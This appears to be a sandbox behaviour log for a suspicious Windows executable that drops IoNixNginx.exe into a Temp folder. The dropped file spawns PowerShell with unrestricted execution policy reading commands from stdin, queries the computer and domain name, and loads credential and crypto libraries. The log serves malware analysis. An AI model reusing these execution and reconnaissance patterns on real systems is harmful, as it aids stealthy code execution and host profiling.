Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: msmpeg2vdec.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mfperfhelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptsp.dllJump to behavior
